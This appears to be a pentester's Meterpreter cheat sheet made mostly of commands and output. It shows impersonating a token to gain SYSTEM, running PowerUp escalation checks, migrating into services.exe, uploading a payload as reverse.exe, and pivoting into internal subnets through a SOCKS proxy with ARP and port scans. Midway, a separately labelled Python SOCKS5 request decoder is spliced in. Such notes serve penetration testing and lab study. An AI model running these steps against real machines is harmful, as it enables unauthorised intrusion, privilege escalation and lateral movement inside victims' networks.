Meterpreter

Modules

List of modules

Meterpreter modules: source code.

  • espia : Captures audio, video and screenshots from the remote system.
  • incognito : Allows you to impersonate user tokens.
  • lanattacks
  • powershell : Enables PowerShell (interactive shell, single command, ...).
  • python : Interacts with a Python interpreter.
  • stdapi
  • winpmem
  • extapi
  • kiwi : Mimikatz extension.
  • peinjector : Injects a given shellcode into an executable file.
  • priv : Privilege escalation extension.
  • sniffer : Packet sniffer.
  • unhook

Incognito

meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
[...]
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Powershell

meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell

PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
[...]

Migrate to a process

More information about the migrate command.

Even though you hold a higher-privileged token, you may not actually have the permissions of a privileged user. This is due to the way Windows handles permissions: it uses the primary token of the process, not the impersonated token, to determine what the process can or cannot do. Make sure you migrate to a process that has the permissions you need.

meterpreter > ps | grep services
Filtering on 'services'

Process List
============

 PID  PPID  Name          Arch  Session  User                 Path
 ---  ----  ----          ----  -------  ----                 ----
 668  580   services.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\services.exe

meterpreter > migrate 668
[*] Migrating from 996 to 668...
[*] Migration completed successfully.

Search for files

meterpreter > search -f shell.exe
Found 1 result...
=================

Path                              Size (bytes)  Modified (UTC)
----                              ------------  --------------
c:\Users\bruce\Desktop\shell.exe  73802         2021-12-11 12:20:17 +0100

Upload / Download

meterpreter > download shell.exe
[*] Downloading: shell.exe -> /home/.../alfred/shell.exe
[*] Downloaded 72.07 KiB of 72.07 KiB (100.0%): shell.exe -> /home/.../alfred/shell.exe
[*] download   : shell.exe -> /home/.../alfred/shell.exe

meterpreter > upload shell.exe 'c:\Users\bruce\Desktop\reverse.exe'
[*] uploading  : /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe
[*] uploaded   : /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe

Autoroute & SOCKS proxy

Start the SOCKS proxy server (default: 127.0.0.1:8080 with SOCKS5).

msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server

Then, use autoroute.

msf6 auxiliary(server/socks_proxy) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run autoroute -s 172.16.1.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.1.0/255.255.255.0...
[+] Added route to 172.16.1.0/255.255.255.0 via 10.10.110.100
[*] Use the -p option to list all active routes

Finally, use the proxy options:

curl --proxy socks5://127.0.0.1:1080 http://172.16.1.100:4444/

or proxychains:

Add the line socks5 127.0.0.1 1080 to the end of /etc/proxychains.conf.

proxychains curl http://172.16.1.100:4444/
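What curl and proxychains send to the SOCKS proxy above is plain SOCKS5 (RFC 1928). As an added example, not part of the original notes or of Metasploit, here is a small Python encoder/decoder for the client greeting and the CONNECT request: it builds the request for the sample pivot target 172.16.1.100:4444 and decodes requests captured on the proxy port, which is how an analyst recovers where a proxied connection was really going. All sample bytes are constructed here, not captured.

```python
import ipaddress
import struct

# SOCKS5 constants from RFC 1928 (the protocol curl and proxychains speak above).
SOCKS_VERSION = 0x05
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04


def parse_greeting(data: bytes) -> list:
    """Decode the client greeting (VER, NMETHODS, METHODS...) and return the
    offered auth methods; 0x00 means 'no authentication required'."""
    if len(data) < 2 or data[0] != SOCKS_VERSION or len(data) != 2 + data[1]:
        raise ValueError("malformed SOCKS5 greeting")
    return list(data[2:])


def build_connect_request(host: str, port: int) -> bytes:
    """Build the CONNECT request a client sends after method negotiation.
    Host and port are whatever the caller passes (constructed sample values)."""
    try:
        ip = ipaddress.ip_address(host)
        addr = bytes([ATYP_IPV4 if ip.version == 4 else ATYP_IPV6]) + ip.packed
    except ValueError:                      # not an IP literal: send as a domain name
        name = host.encode("idna")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def parse_connect_request(data: bytes) -> tuple:
    """Decode a CONNECT request seen on the proxy port; returns (host, port).
    Raises ValueError on anything that is not a well-formed SOCKS5 CONNECT."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 request")
    if data[1] != CMD_CONNECT:
        raise ValueError("unsupported command 0x%02x" % data[1])
    atyp = data[3]
    if atyp == ATYP_IPV4:                   # IPv4Address() rejects a short slice
        host, end = str(ipaddress.IPv4Address(data[4:8])), 8
    elif atyp == ATYP_IPV6:
        host, end = str(ipaddress.IPv6Address(data[4:20])), 20
    elif atyp == ATYP_DOMAIN:               # one length byte, then the name
        n = data[4]
        host, end = data[5:5 + n].decode("ascii"), 5 + n
    else:
        raise ValueError("unknown address type 0x%02x" % atyp)
    if len(data) != end + 2:
        raise ValueError("truncated or over-long request")
    return host, struct.unpack("!H", data[end:end + 2])[0]
```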

ARP Scanner

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_psexec) >  use post/windows/gather/arp_scanner
msf6 post(windows/gather/arp_scanner) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/arp_scanner) > set RHOSTS 172.16.2.0/24
RHOSTS => 172.16.2.0/24
msf6 post(windows/gather/arp_scanner) > run

[...]

Port Scanner

msf6 > route add 172.16.2.0 255.255.255.0 1
[*] Route added

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 172.16.2.0-255
RHOSTS => 172.16.2.0-255
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 22,80,88,445
PORTS => 22,80,88,445
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 172.16.2.5:           - 172.16.2.5:88 - TCP OPEN
[+] 172.16.2.5:           - 172.16.2.5:445 - TCP OPEN